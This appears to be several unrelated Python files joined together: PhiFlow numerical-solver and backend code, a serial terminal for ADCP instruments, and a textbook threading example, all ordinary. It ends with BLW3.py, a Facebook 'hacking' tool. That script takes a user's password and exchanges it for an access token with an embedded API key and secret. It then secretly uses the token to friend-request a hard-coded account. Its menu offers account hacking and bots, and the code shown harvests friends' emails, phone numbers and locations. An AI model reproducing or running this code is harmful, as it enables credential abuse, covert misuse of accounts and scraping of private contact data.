raise NotImplementedError(f"Method '{method}' not supported for linear solve.")
def conjugate_gradient(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Standard conjugate gradient algorithm. Signature matches to `Backend.linear_solve()`. """
# Based on "An Introduction to the Conjugate Gradient Method Without the Agonizing Pain" by Jonathan Richard Shewchuk
# symbols: dx=d, dy=q, step_size=alpha, residual_squared=delta, residual=r, y=b
method = f"Φ-Flow CG ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def cg_loop_body(continue_, it_counter, x, dx, residual_squared, residual, iterations, function_evaluations, _converged, _diverged):
continue_1 = self.to_int32(continue_)
it_counter += 1; iterations += continue_1
with spatial_derivative_evaluation(1):
dy = self.linear(lin, dx); function_evaluations += continue_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(residual_squared, dx_dy)
step_size *= self.expand_dims(self.to_float(continue_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
# if it_counter % 50 == 0:
# residual = y - self.linear(lin, x); function_evaluations += 1
# else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared_old = residual_squared
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual + self.divide_no_nan(residual_squared, residual_squared_old) * dx
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, it_counter, x, dx, residual_squared, residual, iterations, function_evaluations, converged, diverged
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged = self.while_loop(cg_loop_body, (continue_, 0, x, dx, residual_squared, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def conjugate_gradient_adaptive(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Conjugate gradient algorithm with adaptive step size. Signature matches to `Backend.linear_solve()`. """
# Based on the variant described in "Methods of Conjugate Gradients for Solving Linear Systems" by Magnus R. Hestenes and Eduard Stiefel
# https://nvlpubs.nist.gov/nistpubs/jres/049/jresv49n6p409_A1b.pdf
method = f"Φ-Flow CG-adaptive ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
dy = self.linear(lin, dx)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def acg_loop_body(continue_, it_counter, x, dx, dy, residual, iterations, function_evaluations, _converged, _diverged):
continue_1 = self.to_int32(continue_)
it_counter += 1
iterations += continue_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(self.sum(dx * residual, axis=-1, keepdims=True), dx_dy)
step_size *= self.expand_dims(self.to_float(continue_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
# if it_counter % 50 == 0: # Not traceable since Python bool
# residual = y - self.linear(lin, x); function_evaluations += 1
# else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual - self.divide_no_nan(self.sum(residual * dy, axis=-1, keepdims=True) * dx, dx_dy)
with spatial_derivative_evaluation(1):
dy = self.linear(lin, dx); function_evaluations += continue_1
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, it_counter, x, dx, dy, residual, iterations, function_evaluations, converged, diverged
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged = self.while_loop(acg_loop_body, (continue_, 0, x, dx, dy, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def linear(self, lin, vector):
if callable(lin):
return lin(vector)
elif isinstance(lin, (tuple, list)):
for lin_i in lin:
lin_shape = self.staticshape(lin_i)
assert len(lin_shape) == 2
return self.stack([self.matmul(m, v) for m, v in zip(lin, self.unstack(vector))])
else:
lin_shape = self.staticshape(lin)
assert len(lin_shape) == 2, f"A must be a matrix but got shape {lin_shape}"
return self.matmul(lin, vector)
def gradients(self, y, xs: tuple or list, grad_y) -> tuple:
raise NotImplementedError(self)
def record_gradients(self, xs: tuple or list, persistent=False):
raise NotImplementedError(self)
def stop_gradient(self, value):
raise NotImplementedError(self)
def grid_sample(self, grid, coordinates, extrapolation: str):
"""
Interpolates a regular grid at the specified coordinates.
Args:
grid: Tensor of shape (batch, spatial..., channel)
coordinates: Tensor of floating grid indices of shape (batch, instance..., vector).
The last dimension must match `spatial_dims`.
The first grid point of dimension i lies at position 0, the last at values.shape[i]-1.
extrapolation: Values to use for coordinates outside the grid.
One of `('undefined', 'zeros', 'boundary', 'periodic', 'symmetric', 'reflect')`.
Returns:
sampled values with linear interpolation
"""
return NotImplemented
def variable(self, value):
return NotImplemented
def ndims(self, tensor):
return len(self.staticshape(tensor))
def size(self, array):
return self.prod(self.shape(array))
def multi_slice(self, tensor, slices: tuple):
return tensor[slices]
def batch_gather(self, tensor, batches):
if isinstance(batches, int):
batches = [batches]
return tensor[batches, ...]
def unstack(self, tensor, axis=0, keepdims=False) -> tuple:
if axis < 0:
axis += len(tensor.shape)
if axis >= len(tensor.shape) or axis < 0:
raise ValueError("Illegal axis value")
result = []
for slice_idx in range(tensor.shape[axis]):
if keepdims:
component = tensor[tuple([slice(slice_idx, slice_idx + 1) if d == axis else slice(None) for d in range(len(tensor.shape))])]
else:
component = tensor[tuple([slice_idx if d == axis else slice(None) for d in range(len(tensor.shape))])]
result.append(component)
return tuple(result)
def equal(self, x, y):
""" Element-wise equality check """
raise NotImplementedError(self)
def not_equal(self, x, y):
return ~self.equal(x, y)
def greater_than(self, x, y):
x, y = self.auto_cast(x, y)
return x > y
def greater_or_equal(self, x, y):
x, y = self.auto_cast(x, y)
return x >= y
def add(self, a, b):
a, b = self.auto_cast(a, b)
return a + b
def sub(self, a, b):
a, b = self.auto_cast(a, b)
return a - b
def mul(self, a, b):
a, b = self.auto_cast(a, b)
return a * b
def div(self, numerator, denominator):
numerator, denominator = self.auto_cast(numerator, denominator)
return numerator / denominator
def pow(self, base, exp):
base, exp = self.auto_cast(base, exp)
return base ** exp
def mod(self, dividend, divisor):
dividend, divisor = self.auto_cast(dividend, divisor)
return dividend % divisor
def and_(self, a, b):
a, b = self.auto_cast(a, b)
return a & b
def or_(self, a, b):
a, b = self.auto_cast(a, b)
return a | b
def xor(self, a, b):
a, b = self.auto_cast(a, b)
return a ^ b
def floordiv(self, a, b):
a, b = self.auto_cast(a, b)
return a // b
BACKENDS = []
""" Global list of all registered backends. Register a `Backend` by adding it to the list. """
_DEFAULT = [] # [0] = global default, [1:] from 'with' blocks
_PRECISION = [32] # [0] = global precision in bits, [1:] from 'with' blocks
def choose_backend(*values, prefer_default=False) -> Backend:
"""
Selects a suitable backend to handle the given values.
This function is used by most math functions operating on `Tensor` objects to delegate the actual computations.
Backends need to be registered to be available, e.g. via the global import `phi.<backend>` or `phi.detect_backends()`.
Args:
*values:
prefer_default: Whether to always select the default backend if it can work with `values`, see `default_backend()`.
Returns:
The selected `Backend`
"""
# --- Default Backend has priority ---
if _is_applicable(_DEFAULT[-1], values) and (prefer_default or _is_specific(_DEFAULT[-1], values)):
return _DEFAULT[-1]
# --- Filter out non-applicable ---
backends = [backend for backend in BACKENDS if _is_applicable(backend, values)]
if len(backends) == 0:
raise NoBackendFound(f"No backend found for types {[type(v).__name__ for v in values]}; registered backends are {BACKENDS}")
# --- Native tensors? ---
for backend in backends:
if _is_specific(backend, values):
return backend
return backends[0]
class NoBackendFound(Exception):
"""
Thrown by `choose_backend` if no backend can handle the given values.
"""
def __init__(self, msg):
Exception.__init__(self, msg)
def default_backend() -> Backend:
"""
The default backend is preferred by `choose_backend()`.
The default backend can be set globally using `set_global_default_backend()` and locally using `with backend:`.
Returns:
current default `Backend`
"""
return _DEFAULT[-1]
def context_backend() -> Backend or None:
"""
Returns the backend set by the inner-most surrounding `with backend:` block.
If called outside a backend context, returns `None`.
Returns:
`Backend` or `None`
"""
return _DEFAULT[-1] if len(_DEFAULT) > 1 else None
def set_global_default_backend(backend: Backend):
"""
Sets the given backend as default.
This setting can be overridden using `with backend:`.
See `default_backend()`, `choose_backend()`.
Args:
backend: `Backend` to set as default
"""
assert isinstance(backend, Backend)
_DEFAULT[0] = backend
def set_global_precision(floating_point_bits: int):
"""
Sets the floating point precision of DYNAMIC_BACKEND which affects all registered backends.
If `floating_point_bits` is an integer, all floating point tensors created henceforth will be of the corresponding data type, float16, float32 or float64.
Operations may also convert floating point values to this precision, even if the input had a different precision.
If `floating_point_bits` is None, new tensors will default to float32 unless specified otherwise.
The output of math operations has the same precision as its inputs.
Args:
floating_point_bits: one of (16, 32, 64, None)
"""
_PRECISION[0] = floating_point_bits
def get_precision() -> int:
"""
Gets the current target floating point precision in bits.
The precision can be set globally using `set_global_precision()` or locally using `with precision(p):`.
Any Backend method may convert floating point values to this precision, even if the input had a different precision.
Returns:
16 for half, 32 for single, 64 for double
"""
return _PRECISION[-1]
@contextmanager
def precision(floating_point_bits: int):
"""
Sets the floating point precision for the local context.
Usage: `with precision(p):`
This overrides the global setting, see `set_global_precision()`.
Args:
floating_point_bits: 16 for half, 32 for single, 64 for double
"""
_PRECISION.append(floating_point_bits)
try:
yield None
finally:
_PRECISION.pop(-1)
def convert(tensor, backend: Backend = None, use_dlpack=True):
"""
Convert a Tensor to the native format of `backend`.
If the target backend can operate natively on `tensor`, returns `tensor`.
If both backends support *DLPack* and `use_dlpack=True`, uses zero-copy conversion using the DLPack library.
Else, intermediately converts `tensor` to a NumPy array.
*Warning*: This operation breaks the automatic differentiation chain.
Args:
tensor: Native tensor belonging to any registered backend.
backend: Target backend. If `None`, uses the current default backend, see `default_backend()`.
Returns:
Tensor belonging to `backend`.
"""
backend = backend or default_backend()
current_backend = choose_backend(tensor, prefer_default=False)
if backend.is_tensor(tensor, True) or backend is current_backend:
return tensor
if use_dlpack and current_backend.supports(Backend.to_dlpack) and backend.supports(Backend.from_dlpack):
capsule = current_backend.to_dlpack(tensor)
return backend.from_dlpack(capsule)
else:
nparray = current_backend.numpy(tensor)
return backend.as_tensor(nparray)
# Backend choice utility functions
def _is_applicable(backend, values):
for value in values:
if not (backend.is_tensor(value, only_native=False) or backend.is_module(value)):
return False
return True
def _is_specific(backend: Backend, values):
for value in values:
if backend.is_tensor(value, only_native=True) or backend.is_module(value):
return True
return False
# Other low-level helper functions
def combined_dim(dim1, dim2, type_str: str = 'batch'):
if dim1 is None and dim2 is None:
return None
if dim1 is None or dim1 == 1:
return dim2
if dim2 is None or dim2 == 1:
return dim1
assert dim1 == dim2, f"Incompatible {type_str} dimensions: x0 {dim1}, y {dim2}"
return dim1
_SPATIAL_DERIVATIVE_CONTEXT = [0]
_FUNCTIONAL_DERIVATIVE_CONTEXT = [0]
@contextmanager
def spatial_derivative_evaluation(order=1):
_SPATIAL_DERIVATIVE_CONTEXT.append(order)
try:
yield None
finally:
assert _SPATIAL_DERIVATIVE_CONTEXT.pop(-1) == order
def get_spatial_derivative_order():
"""
Extrapolations may behave differently when extrapolating the derivative of a grid.
Returns 1 inside a CG loop, and 0 by default.
"""
return _SPATIAL_DERIVATIVE_CONTEXT[-1]
@contextmanager
def functional_derivative_evaluation(order=1):
_FUNCTIONAL_DERIVATIVE_CONTEXT.append(order)
try:
yield None
finally:
assert _FUNCTIONAL_DERIVATIVE_CONTEXT.pop(-1) == order
def get_functional_derivative_order():
"""
Operations that do not define a first or higher-order derivative may use slower alternative code paths when the derivative is `>0`.
This is set when calling a function created by `math.functional_gradient()` or `math.hessian()`.
"""
return _FUNCTIONAL_DERIVATIVE_CONTEXT[-1]
PHI_LOGGER = logging.getLogger('Φ') # used for warnings and debug messages by all internal PhiFlow functions
_LOG_CONSOLE_HANDLER = logging.StreamHandler(sys.stdout)
_LOG_CONSOLE_HANDLER.setFormatter(logging.Formatter("%(message)s (%(levelname)s), %(asctime)sn\n"))
_LOG_CONSOLE_HANDLER.setLevel(logging.NOTSET)
PHI_LOGGER.addHandler(_LOG_CONSOLE_HANDLER)
|
AdcpTerminal.py
|
import rti_python.Comm.adcp_serial_port as adcp_serial
import rti_python.Writer.rti_binary as RtiBinaryWriter
import threading
import time
import serial
import logging
from obsub import event
from threading import Lock
from rti_python.Utilities.config import RtiConfig
class AdcpTerminalVM:
"""
Setup a view to monitor for waves data and covert it to MATLAB format for WaveForce AutoWaves.
"""
def __init__(self, rti_config: RtiConfig):
self.rti_config = rti_config
self.rti_config.init_terminal_config()
self.adcp = None
self.adcp_thread = None
self.adcp_thread_alive = False
self.serial_recorder = None
self.is_recording = False
self.bytesWrittenLabel = 0
self.totalBytesWrittenLabel = 0
self.bytesWrittenLabel = ""
self.MAX_SERIAL_CONSOLE_LEN = 9000
self.serialTextBrowser = ""
self.thread_lock = Lock()
def comm_port_list(self):
"""
Ste the serial ports to the list.
:return:
"""
# Add all the found serial ports
return adcp_serial.get_serial_ports()
def baud_rate_list(self):
"""
Set the baud rates to the list.
:return:
"""
return adcp_serial.get_baud_rates()
def get_data(self):
# Lock the object
self.thread_lock.acquire()
is_connected = False
if self.adcp:
is_connected = True
term_data = {
"isConnected": is_connected,
"termData": self.serialTextBrowser,
"baud": self.rti_config.config['Comm']['Baud'],
"commPort": self.rti_config.config['Comm']['Port']
}
# Release lock
self.thread_lock.release()
logging.info(term_data)
return term_data
def connect_serial(self, port, baud):
"""
Connect the serial port and the read thread.
:return:
"""
logging.info("Serial Connect: " + port + " : " + str(baud))
self.serialTextBrowser += "Serial Connect: " + port + " : " + str(baud)
# Store the configuration
self.rti_config.config['Comm']['Port'] = port
self.rti_config.config['Comm']['Baud'] = str(baud)
self.rti_config.write()
try:
self.adcp = adcp_serial.AdcpSerialPort(port, baud)
except ValueError as ve:
self.serialTextBrowser += "Error opening serial port. " + str(ve)
logging.error("Error opening serial port. " + str(ve))
return
except serial.SerialException as se:
self.serialTextBrowser += "Error opening serial port. " + str(se)
logging.error("Error opening serial port. " + str(se))
return
except Exception as e:
self.serialTextBrowser += "Error opening serial port. " + str(e)
logging.error("Error opening serial port. " + str(e))
return
# Start the read thread
self.adcp_thread_alive = True
self.adcp_thread = threading.Thread(name="Serial Terminal Thread", target=thread_worker, args=(self,))
self.adcp_thread.start()
def disconnect_serial(self):
"""
Disconnect the serial port and stop the read thread.
:return:
"""
self.adcp_thread_alive = False
if self.adcp:
self.adcp.disconnect()
self.adcp = None
self.serialTextBrowser += "Serial Disconnect."
logging.info("Serial Disconnect")
def serial_break(self):
"""
Send a BREAK to the serial port.
:return:
"""
# Clear the display
self.serialTextBrowser = ""
# Send a BREAK
if self.adcp:
self.adcp.send_break(1.25)
logging.info("BREAK SENT")
def send_cmd(self, cmd: str):
"""
Send a command to the ADCP.
:return:
"""
if self.adcp:
if len(cmd) > 0:
self.adcp.send_cmd(cmd)
logging.info("Write to serial port: " + cmd)
def start_pinging(self):
"""
Send the command to start pinging.
:return:
"""
if self.adcp:
self.adcp.start_pinging()
logging.info("Start Pinging")
def stop_pinging(self):
"""
Send the command to stop pinging.
:return:
"""
if self.adcp:
self.serialTextBrowser = ""
self.adcp.stop_pinging()
logging.info("Stop Pinging")
def fix_adcp_comm(self):
"""
If the ADCP stops communicating, try to fix the ADCP and regain communication.
:return:
"""
if self.adcp:
# Send a BREAK
self.adcp.send_break(1.25)
# Wait
time.sleep(1.0)
# Send a STOP
self.adcp.stop_pinging()
time.sleep(1.0)
# Send command to start pinging
self.adcp.start_pinging()
else:
logging.error("ADCP is not connected.")
def shutdown(self):
"""
Shutdown the VM.
:return:
"""
logging.debug("Shutdown Terminal VM")
self.disconnect_serial()
if self.serial_recorder:
self.serial_recorder.close()
def turn_on_off_record(self):
if self.is_reocording:
self.serial_recorder = RtiBinaryWriter.RtiBinaryWriter(folder_path=self.rti_config.config['Comm']['output_dir'])
logging.debug("Start Recording")
else:
if self.serial_recorder:
self.serial_recorder.close()
logging.debug("Stop Recording")
self.serial_recorder = None
def record_data(self, data):
if self.serial_recorder:
self.serial_recorder.write(data)
def update_record_count(self, file_count, total_count, file_path):
"""
Update the recording file sizes.
:param file_count: Total file size of current file.
:param total_count: Total size of all files written.
:param file_path: Path of current filr.
:return:
"""
self.bytesWrittenLabel = str(file_count)
self.totalBytesWrittenLabel = str(total_count)
self.bytesWrittenLabel = file_path
def clear_console(self):
self.serialTextBrowser = ""
def clear_bulk_cmd(self):
self.bulkCmdMlainTextEdit = ""
def send_bulk_cmd(self, bulk_cmds: str):
cmds = bulk_cmds.splitlines()
for cmd in cmds:
self.adcp.send_cmd(cmd + "\n")
logging.debug("Write to serial port: " + cmd)
time.sleep(0.25)
@event
def on_serial_data(self, data):
"""
Subscribe to receive serial data.
:param data: Data from the serial port.
:return:
"""
logging.info("Data Received")
def thread_worker(vm):
"""
Thread worker to handle reading the serial port.
:param vm: This VM to get access to the variables.
:return:
"""
while vm.adcp_thread_alive:
try:
if vm.adcp.raw_serial.in_waiting:
# Read the data from the serial port
data = vm.adcp.read(vm.adcp.raw_serial.in_waiting)
try:
# Display the data as ASCII if it is a response from the ADCP
# If it is raw binary ADCP data, this will fail so just display binary data
ascii_data = data.decode('ascii')
vm.serialTextBrowser += ascii_data
logging.debug(ascii_data)
except Exception:
# Do nothing
vm.serialTextBrowser += str(data)
# Prevent overflow of buffer, if greater than buffer limit
# Get the last bytes in buffer
if len(vm.serialTextBrowser) > 5000:
vm.serialTextBrowser = vm.serialTextBrowser[-5000]
# Record data if turned on
vm.record_data(data)
# Publish the data
vm.on_serial_data(data)
time.sleep(0.01)
except serial.SerialException as se:
logging.error("Error using the serial port.\n" + str(se))
vm.disconnect_serial()
except Exception as ex:
logging.error("Error processing the data.\n" + str(ex))
|
Chap10_Example10.2.py
|
from threading import *
def my_msgprint():
print("The above line is executed by: ", current_thread().getName())
print("Main Thread creating child object")
mthread = Thread(target = my_msgprint) # L1
print("Main Thread starting child thread")
mthread.start()# L2
|
BLW3.py
|
#!/usr/bin/python
# coding=utf-8
# BLackWhite
# Source : Python2
# BLW V.3
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mBLW3 V.1
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m: \033[1;93mNoprian | BLackWhite \033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mGitHub \033[1;93m: \033[1;93m\033[4mBLackWhite0711 \033[0m \033[1;93m ║
\033[1;93m╚════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mTungguPilat! \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/BLackWhite0711/BLW2')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/BLackWhite0711/BLW2')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
